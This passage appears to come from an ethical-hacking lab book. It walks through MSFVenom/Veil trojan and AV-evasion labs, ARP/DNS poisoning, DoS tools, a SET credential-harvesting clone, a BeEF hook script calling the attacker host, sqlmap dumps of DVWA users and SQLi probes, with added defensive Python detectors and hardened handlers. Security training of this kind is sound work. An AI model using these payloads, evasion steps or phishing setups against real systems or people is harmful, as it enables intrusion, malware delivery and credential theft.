legitimate, benevolent/useful software. Let’s
say you hide some exploit code within a
video game executable; that video game
executable becomes a Trojan horse for your
exploit code. Viruses are the type of malware
that cannot propagate on their own and
instead require user interaction to do so.
Worms, on the other hand, can propagate on
their own, and that’s the main difference
between the two. Ransomware is malware
designed with the specific purpose of
requesting ransom from you—most often in
the form of cryptocurrency payments. In
order to hold its sway over you, the
ransomware most commonly encrypts your
filesystem, rendering you unable to use it and
have access to your files.
windows/meterpreter_reverse_tcp
windows/meterpreter/reverse_tcp
Lab Objective:
Learn how to perform basic malware
obfuscation using MSFVenom.
Lab Purpose:
So, we’ve created our malware. However,
pretty much all Anti-Virus (AV) software
catches it, and we are unable to use it. What
do we do? Check it out in this lab.
Lab Tool:
MSFVenom.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Remember how, in the firewall and IDS
evasion lab, we mentioned that most
defensive mechanisms work based on
signatures? That’s not always the case and is
an oversimplification, but it does form the
basis for things such as AV, anti-malware,
etc. Still, computers get infected even in this
day and age . . . how? That’s where
obfuscation techniques come into play. We’ll
look into some of them, starting with
encoders, the topic of this lab.
Lab Objective:
Learn how to create a trojan using
MSFVenom.
Lab Purpose:
Now that we’ve seen how it may be possible
to trick an application such as an AV, let’s
see how we can trick fellow humans.
Lab Tool:
MSFVenom.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
We’ve had a lab on steganography, but an
exploit hidden like that is not a trojan. Why?
Well, because if someone opens the picture
we’ve hidden our exploit in, nothing will
happen; the exploit code will not execute.
With trojans, the intended consequence is that
the hidden code gets executed, so let’s see
how we can do just that.
Lab Objective:
Learn how to perform additional obfuscation
using Veil.
Lab Purpose:
Veil is a tool specifically designed to
facilitate evasion of defensive measures on
our ethical hacking targets.
Lab Tool:
Veil.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Before anything, let’s make sure Veil is
installed and is the latest version on our Kali
box:
apt update
apt install veil
veil
Lab Objective:
Consolidation of malware-related knowledge.
Lab Purpose:
Like in the previous wrap-up labs, we’re
going to look back at everything we’ve
learned pertaining to malware and work
towards creating as stealthy a malware as
possible.
Lab Tool:
MSFVenom.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
One very important thing we haven’t
mentioned so far is that, while you might
feel inclined to think the best course of
action is to have an undetectable malware at
the ready and use it in every situation,
regardless of the specific target technologies,
this is almost never a good idea. Instead, what
is considered best practice is enumerating
your target thoroughly and then, based on that
information, creating only the bare minimum
necessary to achieve exploitation. The reason
for this approach is twofold. No. 1: it saves
time; simple tools, ideas and actions usually
take significantly less time than highly
complex ones. No. 2: it allows you to always
have an “ace up your sleeve.” Let’s say, for
example, that you identified a particular AV
on a target, and you’ve created malware that
can bypass that AV but not much else. The
malware does its thing but, in the process,
you’ve sent it to VirusTotal in order to check
whether it’ll pass or not. Now VirusTotal has
shared that signature with AV vendors, and
your malware no longer works. You can add a
bit of complexity to it, and it’ll pass again,
and so on. If you launch a highly
sophisticated malware immediately and its
specific signature gets flagged by AVs, you
are left with nothing that’ll work.
Lab Objective:
Learn how to perform a MAC flooding
attack.
Lab Purpose:
MAC flooding is a type of attack in which the
legitimate contents of a switch’s MAC table
are replaced with the attacker’s desired ones
by flooding network switches with unicast
frames.
Lab Tool:
Macof.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
MAC stands for Media Access Control and is
the address of a networked device on a
hardware level. Each Network Interface Card
(NIC) has its MAC address set by the
manufacturer. This can, of course, be
changed, but for now, we’ll treat it like it’s a
fingerprint of a NIC.
Next, type:
macof -i eth0
Lab Objective:
Learn how to perform a DHCP starvation
attack.
Lab Purpose:
DHCP stands for Dynamic Host
Configuration Protocol and is responsible for
assigning IP addresses to networked devices.
In this lab, we’ll look into how we can abuse
that protocol to suit our ethical hacking
needs.
Lab Tool:
Yersinia.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
So, why would we need to abuse DHCP
services? Well, in order to trick other devices
on a network into thinking we are who we
want to be (for example, the network’s
default gateway). Doing so would allow us to
perform Man-In-The-Middle (MITM) attacks
and analyze the target network’s traffic.
DHCP starvation can be thought of as one of
the potential steps towards achieving MITM
attacks.
Lab Objective:
Learn how to create a rogue DHCP server.
Lab Purpose:
In the previous lab, we’ve seen how to
perform a DHCP starvation attack. In this
one, we’ll look at furthering that attack vector
by introducing our own rogue DHCP server
to “substitute” the legitimate one, thus
allowing us to issue IP addresses as we see fit
(and, by extension, position ourselves where
we want in the network landscape).
Lab Tool:
Ettercap.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
To start our attack, type:
ettercap -G
Lab Objective:
Learn how to perform ARP poisoning.
Lab Purpose:
ARP, meaning Address Resolution Protocol,
is the protocol responsible for mapping a
device’s IP address to its MAC address.
Lab Tool:
Ettercap.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
By poisoning ARP tables we’re able to trick
devices on a network into thinking we are
something we’re not, for example the
network’s default gateway. We need a
specific target for this lab, which will be our
Windows 7 VM, and we need to enable IP
forwarding on our Kali box, with the
command:
echo 1 > /proc/sys/net/ipv4/ip_forward
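Added example, not the book’s code: a small ARP monitor in Python that flags what the poisoning above looks like from the wire, an IP whose MAC changes and one MAC answering for several IPs. The gateway address and the reply records are constructed; the Kali and Windows addresses are the lab’s.

```python
import ipaddress

# Constructed ARP replies as a monitoring host on the same segment would see
# them: (timestamp, sender IP, sender MAC). The first three are the normal
# state of the lab network; from t=5.0 the gateway's and the victim's IPs
# start being answered for by the Kali VM's MAC, which is what an ARP
# poisoning tool does to sit in the middle. The gateway address is assumed.
SAMPLE_ARP_REPLIES = [
    (1.0, "192.168.77.2",   "00:50:56:e1:aa:01"),  # default gateway (assumed)
    (1.5, "192.168.77.156", "00:0c:29:11:22:33"),  # Windows 7 VM
    (2.0, "192.168.77.128", "00:0c:29:44:55:66"),  # Kali VM
    (5.0, "192.168.77.2",   "00:0c:29:44:55:66"),  # gateway IP -> Kali's MAC
    (5.5, "192.168.77.156", "00:0c:29:44:55:66"),  # victim IP -> Kali's MAC
]


def detect_arp_poisoning(replies, trusted=None):
    """Return alerts for suspicious IP-to-MAC bindings seen in ARP replies.

    trusted: optional {ip: mac} of bindings you know are right (at least the
    default gateway), so the very first spoofed reply is caught even if the
    monitor never saw the legitimate one. Two alert kinds are produced:
      ("binding_changed", ip, old_mac, new_mac)   an IP moved to another MAC
      ("mac_claims_multiple_ips", mac, ips)        one NIC answers for several
    The second is the fingerprint of a MITM host: it has to answer for the
    gateway and for the victim at the same time.
    """
    bindings = {ipaddress.ip_address(ip): mac.lower()
                for ip, mac in (trusted or {}).items()}
    alerts = []
    for ts, ip, mac in replies:
        ip, mac = ipaddress.ip_address(ip), mac.lower()
        previous = bindings.get(ip)
        if previous is not None and previous != mac:
            alerts.append((ts, "binding_changed", str(ip), previous, mac))
        bindings[ip] = mac
        owners = sorted(str(i) for i, m in bindings.items() if m == mac)
        if len(owners) > 1:
            alerts.append((ts, "mac_claims_multiple_ips", mac, tuple(owners)))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES):
        print(alert)
```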
Lab Objective:
Learn how to perform MAC spoofing.
Lab Purpose:
In one of our previous labs, we’ve looked at
MAC flooding, and we’ve mentioned that
MAC addresses, while intended to be sort of
a fingerprint for a NIC, can be changed. In
this lab, we’ll see just how easy it is to do so.
Lab Tool:
MACChanger.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Changing a MAC address in Kali is actually
quite trivial, seeing how there is a tool that
can do it for us, aptly called MACChanger.
As before, let’s type:
macchanger --help
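Added example, not from the book: the defender’s view of the MAC flooding lab above and of this MAC spoofing lab, in Python. It counts distinct source addresses per switch port to spot a flood and checks the locally-administered bit that software-chosen addresses usually carry; the port names and frame records are constructed.

```python
import re
from collections import defaultdict

# Six hex octets separated by ':' or '-', as printed by ifconfig/macchanger.
MAC_RE = re.compile(r"^([0-9a-f]{2})[:-]([0-9a-f]{2})[:-]([0-9a-f]{2})[:-]"
                    r"([0-9a-f]{2})[:-]([0-9a-f]{2})[:-]([0-9a-f]{2})$", re.I)


def parse_mac(mac):
    """Return the six octets of a MAC address as bytes; raise on bad input."""
    m = MAC_RE.match(mac.strip())
    if not m:
        raise ValueError(f"not a MAC address: {mac!r}")
    return bytes(int(octet, 16) for octet in m.groups())


def is_locally_administered(mac):
    """True when the U/L bit (0x02 of the first octet) is set.

    Addresses burned in by the manufacturer have the bit clear; addresses
    picked by software (MACChanger's random mode, most VM hypervisors)
    usually have it set. It is only a hint: a spoofed address can copy a
    real vendor prefix, so treat it as a reason to look closer, not proof.
    """
    return bool(parse_mac(mac)[0] & 0x02)


def detect_mac_flood(frames, window=1.0, threshold=50):
    """Flag switch ports that learn too many distinct source MACs.

    frames: iterable of (timestamp_seconds, port, source_mac).
    Returns {port: peak_distinct_macs_in_one_window} for every port whose
    peak exceeds `threshold`. An access port normally sees a handful of
    addresses; hundreds per second is what a flooding tool produces and
    what makes a switch's MAC table overflow.
    """
    buckets = defaultdict(lambda: defaultdict(set))   # port -> bucket -> MACs
    for ts, port, mac in frames:
        buckets[port][int(ts // window)].add(parse_mac(mac))
    peaks = {port: max(len(macs) for macs in per_bucket.values())
             for port, per_bucket in buckets.items()}
    return {port: peak for port, peak in peaks.items() if peak > threshold}


# Constructed sample: two quiet ports plus one port receiving a burst of
# 200 fabricated source addresses inside a fifth of a second.
SAMPLE_FRAMES = [
    (0.00, "Gi0/1", "00:1a:2b:3c:4d:5e"),
    (0.05, "Gi0/2", "3c:52:82:10:20:30"),
    (0.50, "Gi0/1", "00:1a:2b:3c:4d:5e"),
] + [
    (0.20 + i / 1000, "Gi0/3", f"02:00:5e:00:{i >> 8:02x}:{i & 0xff:02x}")
    for i in range(200)
]

if __name__ == "__main__":
    print("flooded ports:", detect_mac_flood(SAMPLE_FRAMES))
    for mac in ("00:1a:2b:3c:4d:5e", "02:00:5e:00:00:01"):
        print(mac, "locally administered:", is_locally_administered(mac))
```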
Lab Objective:
Learn how to perform DNS poisoning.
Lab Purpose:
DNS (Domain Name System) poisoning, also
known as DNS cache spoofing/poisoning, is
an attack in which we pretend to be a DNS
server, connecting domain names with IP
addresses.
Lab Tool:
Ettercap.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
To start things off, let’s do the following:
ifconfig
arp
route
vi /etc/ettercap/etter.dns
and enter the URL you want to spoof and
your Kali’s IP address like this:
ettercap -G
Lab Objective:
Consolidate knowledge on sniffing attacks.
Lab Purpose:
In this lab, we’re going to put our skills to use
and sniff traffic from unsuspecting victims by
performing a MITM attack.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
So, the attacks we’ve shown pertaining to
sniffing and MITM are MAC flooding,
DHCP starvation and setting up a rogue
DHCP server, ARP poisoning, MAC
spoofing and DNS poisoning. Remember
how we’ve said that you ought to be trying
the simplest methods first and add complexity
only if necessary? In addition to that, we’ve
mentioned that some of these attacks work
best if there is a dedicated hardware
component towards which said attacks can be
directed (such as a switch to use MAC
flooding on). With that in mind, we’ll show
what we can within the constraints of a
simple home networked VM lab.
Lab Objective:
Learn how to perform social engineering
attacks.
Lab Purpose:
Finally, in this lab, we’ll look into what social
engineering is and how to facilitate social
engineering attacks. This will also allow us to
build on top of the previous lab and be able to
serve a near indistinguishable copy of a
website to our targets.
Lab Tool:
SEToolkit.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
First, let’s ensure we have the tool of choice
installed with the commands:
apt update
apt install set
setoolkit
You’ll be presented with categories of attacks
and, for the purpose of this lab, we’ll opt for
1 → 2 → 3 → 2.
192.168.77.128
https://www.facebook.com/
Lab Objective:
Learn how to perform Denial of Service
(DoS) attacks.
Lab Purpose:
We’ll look into how to perform a DoS attack,
which can be helpful if your client wants to
know how resilient their infrastructure is and
how well their defensive measures against
this type of attack are implemented.
Lab Tool:
Hping3.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
The tool we’ll be using is called Hping3, so
let’s look at its help menu with the command:
hping3 --help
Lab Objective:
Learn about the SlowLoris DoS attack.
Lab Purpose:
SlowLoris is a DoS attack targeting web
applications. It works by slowly “browsing” a
target web application, thus occupying
resources and preventing legitimate users
from accessing the desired application.
Lab Tool:
SlowLoris.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
To facilitate this attack, we have to download
one of the many SlowLoris scripts from the
internet. Always be careful when running
public exploits, as they may contain hidden
code with devastating consequences for you
or your clients. That is why we shall utilize a
SlowLoris script with only a handful of lines
of code, which makes it easier to analyze. So,
grab the script from
https://gist.github.com/gkbrk/5de70f35e69343718431
and make the file you save it to executable:
vi slowloris.py
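Added example, not from the book or the linked script: the server-side view of SlowLoris, a Python check over constructed connection events that flags clients holding many connections whose request headers never complete.

```python
from collections import Counter

# Constructed connection-state events as a web server or reverse proxy could
# log them: (timestamp, client_ip, connection_id, event), with event one of
# "open", "headers_complete" or "close". A browser finishes its request
# headers within milliseconds of connecting; SlowLoris opens many sockets
# and deliberately never finishes them, which is what ties up the workers.
SAMPLE_EVENTS = [
    (0.0, "192.168.77.50", "c1", "open"),
    (0.1, "192.168.77.50", "c1", "headers_complete"),
    (0.2, "192.168.77.50", "c2", "open"),
    (0.3, "192.168.77.50", "c2", "headers_complete"),
    (0.9, "192.168.77.50", "c1", "close"),
] + [
    (0.5 + i / 100, "192.168.77.128", f"s{i}", "open") for i in range(150)
]


def stalled_header_connections(events, now, idle_after=30.0, per_client_limit=20):
    """Return {client_ip: count} for clients that, as of `now`, hold at least
    `per_client_limit` connections open for more than `idle_after` seconds
    without having completed their request headers.

    A connection is pending from "open" until its headers arrive or it
    closes, so completed and closed requests never count against a client.
    """
    pending = {}                                  # conn_id -> (client, opened_at)
    for ts, client, conn_id, event in sorted(events):
        if event == "open":
            pending[conn_id] = (client, ts)
        elif event in ("headers_complete", "close"):
            pending.pop(conn_id, None)
    stalled = Counter(client for client, opened_at in pending.values()
                      if now - opened_at > idle_after)
    return {client: n for client, n in stalled.items() if n >= per_client_limit}


if __name__ == "__main__":
    print("at t=5s: ", stalled_header_connections(SAMPLE_EVENTS, now=5.0))
    print("at t=60s:", stalled_header_connections(SAMPLE_EVENTS, now=60.0))
```

On Apache the built-in counterpart is mod_reqtimeout, e.g. `RequestReadTimeout header=20-40,MinRate=500`, which closes connections whose headers do not arrive in time.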
Lab Objective:
Learn how to perform DoS attacks using
Windows tools.
Lab Purpose:
We’ll use this opportunity to look at two DoS
tools designed to be run on Windows
machines. Because these are notorious tools,
we’ll have to make some adjustments to our
lab network.
Lab Tool:
LOIC/HOIC.
Lab Topology:
You can use Windows 7 and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
So first, we want to download the two tools
from these URLs:
https://sourceforge.net/projects/loic/
https://sourceforge.net/projects/high-orbit-ion-cannon/
Lab Objective:
Learn how to perform Cross-Site Scripting
(XSS) attacks.
Lab Purpose:
This is the first of many labs where we’ll
cover web application vulnerabilities and
exploits. We’ll start things off with XSS, one
of the most prevalent bugs in modern web
apps.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
Fire up your Kali and OWASP VMs, identify
OWASP’s IP address then navigate to it
using a web browser of your choice within
Kali. You will be presented with a selection
of web applications, and we want the Damn
Vulnerable Web Application (DVWA).
Lab Objective:
Learn how to identify and exploit Cross-Site
Request Forgery vulnerabilities.
Lab Purpose:
CSRF is another injection vulnerability. The
main difference between XSS and CSRF is
who/what we are targeting. In XSS, we abuse
a client’s trust towards a server, whereas in
CSRF, we exploit a server’s trust towards a
client/user.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
Do everything the same as in the previous lab,
only instead of selecting XSS reflected,
select CSRF. Most commonly, CSRF attacks
allow us to perform an action on the
vulnerable website as a particular user (the
user we’ve used the attack against). So, for
instance, we can issue bank transactions on
behalf of a user, change their password
without their knowledge, and more. Now, the
process of exploiting a CSRF vulnerability is
more involved than XSS. If you possess
knowledge of HTML, JS and PHP, you can
perform source code reviews by clicking on
View Source in the bottom right corner of
DVWA’s window.
From there, you can see that the CSRF form
simply checks whether the two password
entries match and then sends it on its way
without any other verification and
sanitization.
If you do not have that knowledge, however,
proceed with the next steps.
Navigating to http://localhost:80/csrf.html
with your web browser opens up the
following page:
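Added example in Python (not DVWA’s code): the password-change form as the text describes it, checking only that the two entries match, beside a hardened version with a synchronizer token, an Origin check and current-password re-authentication. The session store, the user table and the DVWA origin http://192.168.77.156 are assumed.

```python
import hmac
import secrets

# Constructed in-memory stand-ins for DVWA's session store and user table.
SESSIONS = {}
USERS = {"admin": "password"}


def make_session(user):
    """Log `user` in and return the session id the browser holds in its cookie."""
    sid = secrets.token_hex(8)
    SESSIONS[sid] = {"user": user, "csrf_token": None}
    return sid


def change_password_vulnerable(sid, form):
    """The weak form: checks only that the two new-password fields match.
    The browser attaches the victim's cookie to any POST, including one a
    page like csrf.html submits, so this succeeds for the forged request."""
    user = SESSIONS[sid]["user"]
    if form.get("password_new") != form.get("password_conf"):
        return "mismatch"
    USERS[user] = form["password_new"]
    return "changed"


def issue_csrf_token(sid):
    """Called when the real form is rendered; the token goes in a hidden field."""
    token = secrets.token_hex(16)
    SESSIONS[sid]["csrf_token"] = token
    return token


def change_password_hardened(sid, form, origin, app_origin):
    """Same action with three checks a forged cross-site request cannot pass:
    a per-session synchronizer token the attacker's page cannot read, the
    Origin header the browser sets on cross-site POSTs, and the current
    password, which the attacker does not know.
    """
    sess = SESSIONS[sid]
    expected = sess.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "csrf_rejected"
    if origin != app_origin:
        return "csrf_rejected"
    sess["csrf_token"] = None                        # single use
    if form.get("password_current") != USERS[sess["user"]]:
        return "wrong_current_password"
    if form.get("password_new") != form.get("password_conf"):
        return "mismatch"
    USERS[sess["user"]] = form["password_new"]
    return "changed"


if __name__ == "__main__":
    sid = make_session("admin")
    # What a forged page submits with the victim's cookie: no token, no current password.
    forged = {"password_new": "attacker1", "password_conf": "attacker1"}
    print("vulnerable:", change_password_vulnerable(sid, forged), USERS)
    USERS["admin"] = "password"
    print("hardened, forged:",
          change_password_hardened(sid, forged, "http://localhost", "http://192.168.77.156"))
    legit = dict(forged, csrf_token=issue_csrf_token(sid), password_current="password")
    print("hardened, real form:",
          change_password_hardened(sid, legit, "http://192.168.77.156", "http://192.168.77.156"), USERS)
```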
Lab Objective:
Learn how to perform session hijacking
attacks.
Lab Purpose:
Session hijacking is stealing another user’s
session, so let’s see how we can do that with
our DVWA target.
Lab Tool:
BurpSuite.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
So, start everything as before with regards to
OWASP BWA and DVWA (make sure it is a
fresh system boot) and start BurpSuite. Log
in to DVWA and, after logging in, turn on
FoxyProxy, then intercept a DVWA request
(can be directed anywhere on the page).
Lab Objective:
Putting the session attacks knowledge to use.
Lab Purpose:
In this lab, we’ll look at how we can perform
session attacks on a remote machine and reap
the fruits of our labor within Kali.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux, Windows 7 and
OWASP BWA in a VM for this lab.
Lab Walk-Through:
We’ll be needing three machines for this lab,
one to serve as a . . . server (OWASP), one as
the client whose session we want to
compromise (Windows), and one as us, the
hacker (Kali). This won’t require much of a
setup but rather a change in our payloads
used to achieve exploitation. So, for starters,
simply boot up all three machines and
identify IP addresses. On Kali, open the
terminal, and on Windows, a web browser of
your choice.
Lab Objective:
Learn how to perform directory traversal
attacks.
Lab Purpose:
Directory traversal, also called file inclusion,
is a class of vulnerabilities that allows us
access to otherwise hidden files. There are
two types of directory traversal/file inclusion:
local (LFI) and remote (RFI), which allow us
to read local files or run remote files on the
target, respectively.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
To check out this vulnerability, head over to
DVWA and then its File Inclusion page. The
instructions are conveniently presented to us
on the page itself, so all we have to do here is
edit the ?page= parameter value.
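Added example, not from DVWA: what the ?page= parameter does when it is appended to a path unchecked, beside an allow-list plus realpath containment check in Python. The directory name and page names are constructed and the directory need not exist.

```python
import os

# Constructed stand-in for DVWA's File Inclusion directory; resolved once so
# comparisons below are against the same canonical form realpath() returns.
PAGE_DIR = os.path.realpath("/srv/dvwa-example/vulnerabilities/fi")

# The only pages the File Inclusion feature is meant to serve (constructed).
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}


def resolve_page_vulnerable(base_dir, page):
    """What `include($_GET['page'])`-style code effectively does: glue the
    parameter onto the directory and open whatever that names. normpath()
    shows where the request really lands once '..' is applied."""
    return os.path.normpath(os.path.join(base_dir, page))


def safe_join(base_dir, requested):
    """General containment check: resolve the requested name relative to
    base_dir and refuse it unless the result still lies inside base_dir.
    Returns the resolved path or None. realpath() follows symlinks and
    collapses '..', so the comparison is made on the final location."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def resolve_page_hardened(base_dir, page):
    """Allow-list first, containment second. The allow-list is what stops
    remote inclusion (a URL is not a known page) and anything else that is
    not one of the listed files; the containment check is defence in depth
    in case the list is ever widened to patterns."""
    if page not in ALLOWED_PAGES:
        return None
    return safe_join(base_dir, page)


if __name__ == "__main__":
    for value in ("file1.php", "../../../../etc/passwd", "http://attacker.example/x.txt"):
        print(f"{value!r:38} vulnerable -> {resolve_page_vulnerable(PAGE_DIR, value)}")
        print(f"{'':38} hardened   -> {resolve_page_hardened(PAGE_DIR, value)}")
```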
Lab Objective:
Learn how to perform phishing attacks.
Lab Purpose:
In this lab, we’ll look into performing
phishing attacks, that is, sending unsolicited
emails to target individuals or organizations
for various purposes.
Lab Tool:
SET.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Phishing emails can be used for all sorts of
things. For instance, if we’ve identified a
vulnerable version of, let’s say Adobe
Reader, we can send them a PDF file with
some malicious payload embedded into it.
We can also have them click on a link that
will direct them to a mirrored website so we
can harvest their credentials and much more.
then select 1 → 5 → 1.
Enter your target email address (something
you have control over, like your own,
alternate email) and, depending on what you
have access to, either select 1 (if you want to
use Gmail) or 2 (if you have your own
server). For the purpose of this lab, I’ll select
1.
Lab Objective:
Consolidate knowledge on web server
attacks.
Lab Purpose:
While this lab might be similar to one of our
previous ones, we’re going to introduce some
attacks in new contexts and further expand
upon what our options may be when we are
attacking a web server.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
So, let’s do things from the beginning, which
is the information gathering phase. We will
iterate through several Nmap commands like
this:
nmap -Pn -p- -sS -T4 --reason -vvv 192.168.77.156
nmap -Pn -p 80,443,8080 -sV -T4 --reason -vvv 192.168.77.156
nmap -Pn -p 80,8080 -A -T4 --reason -vvv 192.168.77.156
nmap -Pn -p 80,8080 --script safe,discovery,vuln,exploit --reason -vvv 192.168.77.156
Lab Objective:
Learn how to perform authorization attacks
on web applications.
Lab Purpose:
Authorization sounds similar to
authentication, and while authentication is
concerned with whether your credentials are
correct and are properly validated,
authorization is concerned with whether you
have the privileges needed to access a
particular resource.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
We’ve already talked about directory
traversal vulnerabilities, which is a kind of
authorization attack. Still, CEH tries to
differentiate between server and application
attacks, and LFI/RFI allows us to access files
we should not be able to but which are a part
of the server OS’s file system. What we’ll try
to demonstrate here is accessing files that are
a part of the application.
Lab Objective:
Learn how to attack web application logic.
Lab Purpose:
Pretty much all web applications have some
logic behind them; they operate in certain
ways with the intent of performing certain
functions. If we can abuse this “logic” of an
application, we can subvert its functionality
and make it do unintended things.
Lab Tool:
BurpSuite.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
For the purpose of this lab, we’ll look at
OWASP BWA’s Security Shepherd, as it has
some really neat application logic flaws. So,
head over to
http://192.168.77.156/shepherd/login.jsp and
input admin/password as credentials. It might
ask you to input a new password in order to
replace the default one, so input anything you
like. Then go to Challenges → Poor Data
Validation 1.
So, the challenge asks us to buy “trolls” for
free (the troll meme face). In order to do this,
we have to proxify our requests to BurpSuite:
burpsuite
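Added example, not Security Shepherd’s code: the “buy trolls for free” flaw in Python, a checkout that trusts the submitted price beside one that recomputes the total from a server-side catalog. Item names and prices are constructed.

```python
# Constructed server-side catalog: the only source of truth for prices.
CATALOG = {"troll": 1000, "cat": 500}


def checkout_vulnerable(form):
    """The Poor Data Validation style of flaw: price and quantity are read
    back from the submitted form exactly as the browser (or Burp) sent them."""
    return int(form["quantity"]) * int(form["price"])


def checkout_hardened(form):
    """Recompute everything the client could have edited. Returns
    (total, warnings); a warning records client-side tampering worth
    logging even though it no longer changes the outcome."""
    warnings = []
    item = form.get("item")
    if item not in CATALOG:
        raise ValueError("unknown item")
    try:
        quantity = int(form.get("quantity", ""))
    except ValueError:
        raise ValueError("quantity is not an integer")
    if not 1 <= quantity <= 100:
        raise ValueError("quantity out of range")
    unit_price = CATALOG[item]
    if "price" in form and str(form["price"]) != str(unit_price):
        warnings.append(f"client sent price={form['price']!r}, server uses {unit_price}")
    return quantity * unit_price, warnings


if __name__ == "__main__":
    honest = {"item": "troll", "quantity": "2", "price": "1000"}
    tampered = dict(honest, price="0")        # edited in Burp's intercept
    negative = dict(honest, quantity="-2")    # a refund out of thin air
    for form in (honest, tampered, negative):
        try:
            print(form, "->", checkout_vulnerable(form), "|", checkout_hardened(form))
        except ValueError as err:
            print(form, "->", checkout_vulnerable(form), "| rejected:", err)
```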
Lab Objective:
Learn how to utilize BeEF for XSS.
Lab Purpose:
BeEF is the Browser Exploitation Framework
and helps us achieve greater functionality for
our XSS exploits. Not only that, but it also
simplifies things quite a bit for us.
Lab Tool:
BeEF.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Let’s make sure the tool is installed, up to
date and run it:
apt update
apt install beef-xss
vi /usr/share/beef-xss/config.yaml
Lab Objective:
Consolidate knowledge on web application
attacks.
Lab Purpose:
We’ve done a consolidation lab on web
servers, and now it’s time to do the same with
web applications. We’ll try to show some
additional differences between web server
and application attacks.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
As before with web servers, we will start
things off with information gathering. A
really neat addon that I’m using on Firefox is
called Wappalyzer, so let’s check it out.
<script src="http://192.168.77.128:3000/hook.js"></script>
Lab Objective:
Learn how to perform SQL injections.
Lab Purpose:
SQL injection (SQLi) is, as the name implies,
an injection vulnerability similar to XSS.
However, here we are not targeting the web
application but rather the server (or more
precisely, the database on the server).
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
We’ll return to Metasploitable for the SQLi
labs. Head over to its DVWA instance, then
select the SQL Injection page. Click on View
Help to see the challenge for this exercise.
Lab Objective:
Learn how to perform blind SQLi.
Lab Purpose:
Blind SQLi happens when the information
you are getting back is not enough to make
informed decisions; instead, you have to
come up with tricks to figure things out.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Head over to Metasploitable DVWA’s SQL
Injection (Blind) page and click on View
Help to see the challenge for this exercise,
which is to uncover user passwords. It is not
necessary to view the source because
knowing what it does won’t change the fact
that we have to work without any server
feedback.
Lab Objective:
Learn how to perform SQLi using SQLMap.
Lab Purpose:
SQLMap is incredibly powerful to use for
SQLi. However, we wanted to explain first
what SQLi is and how things work “under the
hood,” so that you can get a better
understanding of the vulnerability. In addition
to that, using a tool such as SQLMap is simply
not possible all the time.
Lab Tool:
SQLMap.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
The fastest and easiest way to run SQLMap
would be through BurpSuite, so let’s see how
that works. Start Burp and proxify traffic
from Metasploitable’s DVWA:
burpsuite
sqlmap -u 'http://192.168.77.139:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low;PHPSESSID=1946aa8cacf96ab1b098164466e2edcd' --dbms=mysql -D dvwa --tables
sqlmap -u 'http://192.168.77.139:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low;PHPSESSID=1946aa8cacf96ab1b098164466e2edcd' --dbms=mysql -D dvwa -T users --columns
sqlmap -u 'http://192.168.77.139:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low;PHPSESSID=1946aa8cacf96ab1b098164466e2edcd' --dbms=mysql -D dvwa -T users -C user,password,user_id --dump
Lab Objective:
Consolidate knowledge on SQLi.
Lab Purpose:
It’s time to look back on the things we’ve
learned in the last couple of labs when it
comes to SQLi.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
So, the first type of SQLi that we’ve looked
at is a simple, basic SQLi, easy to identify
because, when we input something like:
'
"
'-'
' or '1'='1
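Added example, not from DVWA: the probes listed above run against a DVWA-style concatenated query and against a parameterised one, using an in-memory SQLite table with placeholder hashes so it runs offline (DVWA itself uses MySQL, but the probes behave the same way).

```python
import sqlite3

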